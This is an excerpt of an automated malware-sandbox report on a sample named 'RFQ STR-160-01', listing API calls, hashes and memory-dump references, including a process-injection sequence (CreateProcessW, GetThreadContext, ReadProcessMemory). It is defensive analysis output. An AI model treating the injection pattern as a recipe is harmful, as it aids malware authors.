              • Opcode ID: 16720663de1002826667f8df37f3c8a40c3e0974b1c4e35a379d755bd12a22ff
              • Instruction ID: 6e27572dad7a56dfbb7d69693a3845d0a59e91d386d35dc81197ee6ee6473831
              • Opcode Fuzzy Hash: 16720663de1002826667f8df37f3c8a40c3e0974b1c4e35a379d755bd12a22ff
              • Instruction Fuzzy Hash: B6012F326055602ED72466F45849F7F6F45ABD1B74F35061DF8148B1D2EDB1ACC18150
              APIs
              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00602CD4,?,?,?,00000004,00000001), ref: 00602FF2
              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00602CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00603006
              • CloseHandle.KERNEL32(00000000,?,00602CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0060300D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: File$CloseCreateHandleTime
              • String ID:
              • API String ID: 3397143404-0
              • Opcode ID: 62c4548f2b7254194b89f37a898dae9b6d661e9e2627e6f868460c2bcf393e99
              • Instruction ID: 9d217300ec5ad92442902e5f85d5b3e41016f75a88b1ed9124570ef33fec7032
              • Opcode Fuzzy Hash: 62c4548f2b7254194b89f37a898dae9b6d661e9e2627e6f868460c2bcf393e99
              • Instruction Fuzzy Hash: 8FE08636281B2077D3341755BC0EFCF3A1DD786B75F104210FB19751D046A0151242A8
              APIs
              • __Init_thread_footer.LIBCMT ref: 005A17F6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: CALL
              • API String ID: 1385522511-4196123274
              • Opcode ID: 5cc33bbc7d3d0b6375626299da56185c7175eb948e7e43fa42d5f64a93b007b7
              • Instruction ID: 1b937c185f2c5d59bfaf2dd23bfc3857c4b275dfaa7d4e19dd484a80c0cec187
              • Opcode Fuzzy Hash: 5cc33bbc7d3d0b6375626299da56185c7175eb948e7e43fa42d5f64a93b007b7
              • Instruction Fuzzy Hash: 0A2289706086429FC714DF25C494A2EBFF2BF9A394F14891DF4968B3A2D731E841CB96
              APIs
              • _wcslen.LIBCMT ref: 00606F6B
                • Part of subcall function 00594ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EFD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LibraryLoad_wcslen
              • String ID: >>>AUTOIT SCRIPT<<<
              • API String ID: 3312870042-2806939583
              • Opcode ID: c16e25cf258f6e35d47157344c32ecbd7159025e05afc00db60d6d39d014b40e
              • Instruction ID: c541ccd6523f9e51464eb2f0b98ff6553bdc4dc72e357fb7f677e49167ffbe03
              • Opcode Fuzzy Hash: c16e25cf258f6e35d47157344c32ecbd7159025e05afc00db60d6d39d014b40e
              • Instruction Fuzzy Hash: 66B173715082029FCB18EF24C4959AFBBE6BFD4310F04495DF496972A2EB30ED49CB92
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: __fread_nolock
              • String ID: EA06
              • API String ID: 2638373210-3962188686
              • Opcode ID: e1b55456fe01f2ca4e2093a95fd76e076c2375c19757ad0a79d132df1755c604
              • Instruction ID: 3cf3cb1a1d769e5b3469dee9a2be2da6bacdd6151954587d08901753754c0103
              • Opcode Fuzzy Hash: e1b55456fe01f2ca4e2093a95fd76e076c2375c19757ad0a79d132df1755c604
              • Instruction Fuzzy Hash: F701B5729442597EDF19C7A8CC5AEEEBBF89F05301F04455AF552E21C1E5B4E608CB60
              APIs
              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00593908
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: IconNotifyShell_
              • String ID:
              • API String ID: 1144537725-0
              • Opcode ID: 95d9ea98db86b1fa40407d0875b86ab99ab15085e44b8daf11a52c0578e02dff
              • Instruction ID: 28f23afd7a68c2719049d8347dfbfc15df047424cf010d355a6ea9e902a13571
              • Opcode Fuzzy Hash: 95d9ea98db86b1fa40407d0875b86ab99ab15085e44b8daf11a52c0578e02dff
              • Instruction Fuzzy Hash: CE317C70505701DFDB20EF24D88479BBBE8FB49718F04092EF59A97240E7B1AA44CB92
              APIs
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0059949C,?,00008000), ref: 00595773
              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0059949C,?,00008000), ref: 005D4052
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 9acb0fb9559385a2ad6f1b9a822d68a71c15aaedcae4c249a33a7bf5d62ef716
              • Instruction ID: 9f3782d9eb6beed48cb8056e6f9cb29acdd7d37868223cd55c93f739b00e32c9
              • Opcode Fuzzy Hash: 9acb0fb9559385a2ad6f1b9a822d68a71c15aaedcae4c249a33a7bf5d62ef716
              • Instruction Fuzzy Hash: 11018030145625B6E7314A6ADC0EF977F98EF027B0F148201BA9C5E1E0D7B45965CB90
              APIs
              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00599879,?,?,?), ref: 00596E33
              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00599879,?,?,?), ref: 00596E69
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ByteCharMultiWide
              • String ID:
              • API String ID: 626452242-0
              • Opcode ID: 5382487d9c9cdc01dd3817cd8dd4e61cd923d45d11c6c91872eafd8a6a921757
              • Instruction ID: 81240d77045fa96144d918d1da26b7b7e8e13ca8e4d39d43d399b1f8e5524687
              • Opcode Fuzzy Hash: 5382487d9c9cdc01dd3817cd8dd4e61cd923d45d11c6c91872eafd8a6a921757
              • Instruction Fuzzy Hash: 1201DF713002017FEB29ABA9DC0FF7F7EADEB85350F14013EB106DA1E1E9A0AC008664
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 01791A5B
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01791AF1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01791B13
              Memory Dump Source
              • Source File: 00000000.00000002.2140916641.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1790000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
              • Instruction ID: e617f711ff347fae6e96d7fb792e736441df5238d3e06348d27518de52fcefcd
              • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
              • Instruction Fuzzy Hash: 7612EE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A4F95CF5A
              APIs
                • Part of subcall function 00594E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E9C
                • Part of subcall function 00594E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00594EAE
                • Part of subcall function 00594E90: FreeLibrary.KERNEL32(00000000,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EC0
              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EFD
                • Part of subcall function 00594E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E62
                • Part of subcall function 00594E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00594E74
                • Part of subcall function 00594E59: FreeLibrary.KERNEL32(00000000,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E87
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Library$Load$AddressFreeProc
              • String ID:
              • API String ID: 2632591731-0
              • Opcode ID: 70ca59b037b82d8a12055ee3719c6e0d8de5d81630d5970dff1ff82813cfd3f6
              • Instruction ID: 76fe431d9dfac6d021f59cbf5fc179fc3b4e4432f0c621adb994423e4c8c0ec1
              • Opcode Fuzzy Hash: 70ca59b037b82d8a12055ee3719c6e0d8de5d81630d5970dff1ff82813cfd3f6
              • Instruction Fuzzy Hash: 7B11EB32650207AACF25AF64DC0AFAD7BA5BF80750F10441EF542A62D1EE709E469B51
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: __wsopen_s
              • String ID:
              • API String ID: 3347428461-0
              • Opcode ID: 0268e9729ddaaf4bf4d31b738330da76a20dc8fe7c65f855ececd595a0bf43e9
              • Instruction ID: be810104965009ec17f7ab793b787ae317d489cb4687448643ed234fd5e51be6
              • Opcode Fuzzy Hash: 0268e9729ddaaf4bf4d31b738330da76a20dc8fe7c65f855ececd595a0bf43e9
              • Instruction Fuzzy Hash: 5F11487190410AAFCF09DF98E940EAA7BF5FF48304F144069F808AB312DA31EA11CBA5
              APIs
              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0059543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00599A9C
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: d28a2e74920ef0d440ce712c92a2751b8e499dc0192c4c17b41d917d926fd0a3
              • Instruction ID: ee030c8c7e21a26ea0bc94c1b9e88891451038e69be78046913f4927335fd77e
              • Opcode Fuzzy Hash: d28a2e74920ef0d440ce712c92a2751b8e499dc0192c4c17b41d917d926fd0a3
              • Instruction Fuzzy Hash: CA118835200B019FDB20CF0AC885B66BBF9FF44360F14C42EE89B8AA51C775A845CB60
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
              • Instruction ID: f37bb40cde6234f3ae873af3f691605a83a7303d82b97cfe8f9163fcb572a2bd
              • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
              • Instruction Fuzzy Hash: 1DF0F932510A159EC7313EA5AC0EFDA3F98BFD2334F140719F825921D1DB70B80186A5
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 677ef260b211077d3ec3e1441ffea276283e8a04759a8108b308ec58f605610d
              • Instruction ID: 5f4107290d46c86431c8ec010a23caa095d043f4f47d6096b8fd60cabca0e32c
              • Opcode Fuzzy Hash: 677ef260b211077d3ec3e1441ffea276283e8a04759a8108b308ec58f605610d
              • Instruction Fuzzy Hash: B8E0E53110622D5EE7312AE69C19FDA3E59BB827B0F058028FC0596581CB10ED0186E1
              APIs
              • FreeLibrary.KERNEL32(?,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594F6D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID:
              • API String ID: 3664257935-0
              • Opcode ID: 67417752ce575195390e3f875c4d6e4a0352fb1915501579df666b7fc04f52bc
              • Instruction ID: d88267d98496435380d118bcbdfe67abf218691a650b0ed54c97d0fe815bf4fc
              • Opcode Fuzzy Hash: 67417752ce575195390e3f875c4d6e4a0352fb1915501579df666b7fc04f52bc
              • Instruction Fuzzy Hash: DAF01571105792CFDB349F64E494C66BBE4BF143293248A6EE1EA82621C731AC45DF10
              APIs
              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00592DC4
                • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LongNamePath_wcslen
              • String ID:
              • API String ID: 541455249-0
              • Opcode ID: 49a6867d2e7e3a8248da39e1a8ecd1e2d1262c943e8c9ddcc9f5c1ffb76a5816
              • Instruction ID: 927051ff937b76dff98442e8a356f9d1162246e9f642e407efc2bea95632595e
              • Opcode Fuzzy Hash: 49a6867d2e7e3a8248da39e1a8ecd1e2d1262c943e8c9ddcc9f5c1ffb76a5816
              • Instruction Fuzzy Hash: FDE0CD726001255BCB209398DC09FDA77DDEFC8790F040072FD09D7248D960AD848550
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: __fread_nolock
              • String ID:
              • API String ID: 2638373210-0
              • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
              • Instruction ID: c78f9b03d19763ddfda4ee30df11955d1fc7dc4176963aca3aca00d9cfb1ee68
              • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
              • Instruction Fuzzy Hash: 7DE0DFB0209B004FCF3C5A28A8617F777E99F49300F00082EF69F82352E57338418A0D
              APIs
                • Part of subcall function 00593837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00593908
                • Part of subcall function 0059D730: GetInputState.USER32 ref: 0059D807
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00592B6B
                • Part of subcall function 005930F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0059314E
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: IconNotifyShell_$CurrentDirectoryInputState
              • String ID:
              • API String ID: 3667716007-0
              • Opcode ID: 23427b1528de375aa4c58c67a077af9e34be786de92ca6b1751095fde71ada74
              • Instruction ID: f2ee5b62ba9da76ec20344fed38f9d2ddb178de5c77912a67686b6be41374267
              • Opcode Fuzzy Hash: 23427b1528de375aa4c58c67a077af9e34be786de92ca6b1751095fde71ada74
              • Instruction Fuzzy Hash: 04E0262130020646CF08BB75981A5BDAF9AFBE2351F40143EF14287162CE244A464252
              APIs
              • CreateFileW.KERNELBASE(00000000,00000000,?,005D0704,?,?,00000000,?,005D0704,00000000,0000000C), ref: 005D03B7
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 1745c2bf8ffe0b1166d04d65153237ab08878d251097f6f6436c731bdc89d2bb
              • Instruction ID: b3d54ec9c6f92f5315e723a480a908e82a05fe97990a7f3ef58d7eba743681f4
              • Opcode Fuzzy Hash: 1745c2bf8ffe0b1166d04d65153237ab08878d251097f6f6436c731bdc89d2bb
              • Instruction Fuzzy Hash: 71D06C3204010DBBDF128F84DD06EDA3BAAFB48714F014000BE1856020C732E832AB90
              APIs
              • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00591CBC
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: InfoParametersSystem
              • String ID:
              • API String ID: 3098949447-0
              • Opcode ID: 17258973a4a3c627eab4d57cf8ed83d477715faa4ef7ec776edffefb20490c9f
              • Instruction ID: 8449adf88e6d1822af87a634b21f353b39786e2918d71e2c018d69d6d73c5fae
              • Opcode Fuzzy Hash: 17258973a4a3c627eab4d57cf8ed83d477715faa4ef7ec776edffefb20490c9f
              • Instruction Fuzzy Hash: C8C09B352807059FF3244780FC5AF147756A759B10F045001F60A795E3C3E15430D650
              APIs
                • Part of subcall function 00595745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0059949C,?,00008000), ref: 00595773
              • GetLastError.KERNEL32(00000002,00000000), ref: 006076DE
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
